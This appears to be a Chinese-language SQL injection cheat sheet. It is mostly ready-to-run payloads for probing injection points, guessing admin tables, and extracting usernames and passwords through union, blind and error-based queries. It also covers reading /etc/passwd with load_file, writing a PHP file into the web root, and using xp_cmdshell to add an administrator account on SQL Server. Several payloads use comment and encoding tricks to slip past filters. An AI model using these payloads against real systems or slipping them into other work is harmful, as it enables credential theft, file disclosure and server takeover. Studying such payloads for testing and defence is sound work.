手工注入语句总结
0x00,判断是否存在注入点:
12-0
12-1
and 1=1
and 1=2
or 1=1
or 1=2
xor 1=1
xor 1=2
; and 1=1 and 1=2
and '1'='1'
and 1 = 1
%’and 1=1 and ’%’=’
(1)anandd(1=1)
%df
0x01,常见的表名和列名:
常用的表名:
admin user news manage a_admin x_admin m_admin adminuser
admin_user article_admin administrator manager member
memberlist users Manage_User user_info admin_userinfo login new news
常用的列名:
username password id adminusername admin_username adminname
admin_name admin adminuser admin_user user_name user_admin
administrator administrators adminpassword admin_pwd
adminpass userpass user_pass admin_passwod
0x02,Access偏移注入:(适用于工具猜不出列名的情况)
在地址后面加上单引号',服务器会返回下面的错误提示:
Microsoft JET Database Engine 错误 '80040e14'
说明网站使用的是Access数据库,并通过JET引擎连接;同时也说明服务器把数据库的原始错误信息直接回显给了客户端。
关键字 and 1=1
关键字 and 1=2
把 and 1=1 替换成注入语句即可注入。
and 1=1
and 1=2
order by 7--+
order by 8--+
union select 1,2,3,4,5,6,7--+
union select 1,2,3,4,5,6,7 from admin--+
union select 1,2,3,4,5,* from admin --+尝试admin表有几个字段
union select 1,2,3,4,5,6,* from admin--+
union select 1,2,id,4,5,6* from admin--+尝试id属于第几个字段
union select 1,id,3,4,5,6* from admin--+
union select 1,2,* from (admin as a inner join admin as b on a.id=b.id)(这个时候就获得了用户名和密码)
此外,也可以找到后台登录页,用F12查看页面源代码,从表单字段名推测列名
union select 1,2,A_name,Apwd,5,6,7 from admin–+
and 1=2 union select * from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,2,3,*-1,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select 1,a.id,b.id,* from (users as a inner join users as b on a.id=b.id )
and 1=2 union select *from( from (users as a inner join users as b on a.id=b.id )
and 1=2 union select * from ((select * from admin) as a inner join (select * from admin) as b on a.id=b.id) inner join (select id from admin) as c on c.id=a.id
id=49 And (Select Count(*) from Admin)>=0#猜admin表
id=49 and exists (select * from admin)
and 1=(select count(*) from admin where len(name)>6)#错误,猜取字段的长度
and 1=(select count(*) from admin where len(name)>5)#正确 长度是6
id=49 and (select top 1 len(username) from Admin)>0#>1,>2。。判断列的长度为3
id=49 and (select top 1 asc(mid(username,1,1)) from Admin)=114#猜解列名第1个字符,
id=49 and (select top 1 asc(mid(username,2,1)) from Admin)=67#猜解列名第2个字符,
id=49 and (select top 1 asc(mid(username,3,1)) from Admin)=78#猜解列名第3个字符,
id=49 and (select top 1 asc(mid(password,3,1)) from Admin)=78
0x03,mysql注入:
关键字 and 1=1
关键字 and 1=2
把 and 1=1 替换成注入语句即可注入。
猜字段数
order by n/*
查看报错字段
union select 1,2,3,4,5--+
查看mysql基本信息
and 1=2 union select username from users where id=1 union select concat(user(),',',database(),',',version())
and 1=2 union select 1,2,3,concat_ws(char(32,58,32),0x7c,user(),database(),version()),5,6,7/*
查询数据库
and 1=2 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1/*
and 1=2 union select 1,group_concat(schema_name),3,4 from information_schema.schemata/*
查询表名
and 1=2 union select 1,2,3,4,table_name,5 from information_schema.tables where table_schema=数据库的16进制编码 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(table_name),5 from information_schema.tables where table_schema=数据库的16进制编码/*
and 1=2 union select table_name from information_schema.tables where table_schema=database() limit 0,1; #查询表
and 1=2 union select table_name from information_schema.tables where table_schema='bloodzer0' limit 0,1;
查询字段
and 1=2 union select 1,2,3,4,column_name,5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码 limit 1,1/*
and 1=2 union select 1,2,3,4,group_concat(column_name),5,6,7 from information_schema.columns where table_name=表名的十六进制编码 and table_schema=数据库的16进制编码/*
and 1=2 union select table_name from information_schema.tables where table_schema=(select database()) limit 0,1
and 1=2 union select column_name from information_schema.columns where table_name='users' limit 0,1 #查询列
查询数据
and 1=2 union select 1,2,3,字段1,5,字段2,7,8 from 数据库.表/*
and 1=2 union select id,username from users union select 1,2 #mysql执行:语句正常;mssql执行:语句错误,数据类型不匹配,无法正常执行
and 1=2 union select id,username from users union select 1,2 from dual #oracle执行:语句错误,数据类型不匹配
判断是否具有文件读写权限
and (select count(*) from mysql.user)>0/*
and (select count(file_priv) from mysql.user)>0/*
如果有权限,进行load_file()读取文件:
and 1=2 union select * from users union select 1,load_file('/etc/passwd'),3/*(错误写法)
and 1=2 union select * from users union select 1,load_file(0x2F6574632F706173737764),3 #使用16进制绕过单引号限制
and 1=2 union select * from users union select 1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),3
and 1=2 union select * from users union select 1,hex(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),3
如果有权限,用into outfile写入文件:
and 1=2 union select '<?php phpinfo(); ?>' into outfile '/var/www/html/xxx.php'(错误写法)
and 1=2 union select char(60,63,112,104,112,32,112,104,112,105,110,102,111,40,41,59,32,63,62) into outfile '/var/www/html/xxx.php'
如果是SQL Server且拥有sa权限:
id=1;exec master..xp_cmdshell “net user name password /add”--
id=1;exec master..xp_cmdshell “net localgroup name administrators /add”--
如果你有sa权限:
把数据库备份到Web目录下,再通过HTTP把整个数据库完整地下载回来
?id=1;backup database 数据库名 to disk=’c:1.db’;--
使用ascii
AND ascii(substring((SELECT password FROM users where id=1),1,1))=49
使用正则表达式
and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[a-n]' LIMIT 0,1)
使用substring()
and (select 1)=1 正常显示,则substring可以正常使用
and (select substring(@@version,1,1))=4,判断版本
and (select 1 from users limit 0,1)=1,判断user()表
and (select substring(concat(1,password),1,1) from users limit 0,1)=1
and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80
0x04,利用函数的报错注入:
?id=12-0
?id=12-1
/*数据库版本*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*简单办法暴库*/
.php?id=info()
/*连接用户*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接数据库*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴库*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴表*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴字段*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴内容*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
?id=12-0
?id=12-1
id=12 order by 5
id=12 order by 6
id=a()#爆出数据库名
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/ user()),0x7e),1)#爆出数据库名称
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/schema_name /*!%0afrom*/ information_schema.schemata LIMIT 1,1),0x7e),1)#爆库
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/table_name /*!%0afrom*/ information_schema./*!%0ctables*/ where table_schema=0x696C756D696E61635F706F7274616C LIMIT 9,1),0x7e),1)#爆表
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*/column_name /*!%0afrom*/ information_schema.columns where table_name='users' LIMIT 0,1),0x7e),1)#爆字段
id=12 and updatexml(1,/*!%0aconcat*/(0x7e,(/*!%0aSelEcT*//*!%0aconcat*/(username,0x3a,password) from users limit 0,1),0x7e),1)#爆用户名密码
0x05,搜索型注入:
关键字%' and 1=1 and '%'='%
关键字%' and 1=2 and '%'='%
把 and 1=1 替换成注入语句即可注入。
比如:%'and(select count(*)from admin)>0 and '%'='%
0x06,cookie注入:
javascript:alert(document.cookie="id="+escape("44 and 1=1"));
javascript:alert(document.cookie="id="+escape("44 and 1=2"));
把 and 1=1 替换成注入语句即可注入。
0x07,宽字节注入:
id=1%d5 and 1=1
id=1%df and 1=2
把 and 1=1 替换成注入语句即可注入。
0x08,盲注:
场景不同,形式也不同。
如有错误,可以发邮件告诉我,大家相互学习。后期会继续补充。
详见:MySQL注入总结